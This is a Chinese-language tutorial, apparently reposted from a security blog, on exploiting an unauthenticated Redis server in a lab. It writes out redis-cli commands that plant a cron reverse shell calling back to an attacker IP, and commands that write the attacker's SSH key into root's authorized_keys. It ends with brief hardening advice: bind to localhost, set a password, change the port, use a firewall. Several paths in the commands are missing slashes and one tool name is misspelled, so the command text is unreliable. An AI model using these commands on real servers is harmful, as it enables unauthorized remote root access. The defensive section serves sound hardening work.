主机信息
reids-server:192.168.254.132
kali:192.168.254.135
redis-cli
redis-cli是redis命令行工具
./redis-cli -h 127.0.0.1 -p 6379
查看数据
反弹shell
127.0.0.1:6379>set shell "\n* * * * * bash -i >& dev/tcp/192.168.254.143/1234 0>&1\n"127.0.0.1:6379>config set dir var/spool/cron/127.0.0.1:6379>config set dbfilename root127.0.0.1:6379>save
写公钥利用私钥登录
创建密钥
ssh-keygen -t rsa
将公钥写入foo.txt
(echo -e "\n\n"; cat root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
将公钥放在建crackit里
cat root/foo.txt | ./redis-cli -h 192.168.254.132 -x set crackit
链接redis
./resid-cli -h 192.168.254.132
设置数据库备份文件路径为/root/.ssh/
CONFIG SET dir root/.ssh/
设置备份文件名为authorized_keys
CONFIG SET dbfilename "authorized_keys"
保存公钥成功写入
save
使用私钥去链接服务器
防御方法
1、默认只对本地开放
修改配置文件redis.conf
bind 127.0.0.1
2、添加认证密钥
修改配置文件redis.conf
requirepass passwd
3、修改默认端口
port 63790
4、使用firewall进行限制
加入我的星球
扫描二维码
获取更多精彩
NowSec
文章转载自NowSec,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
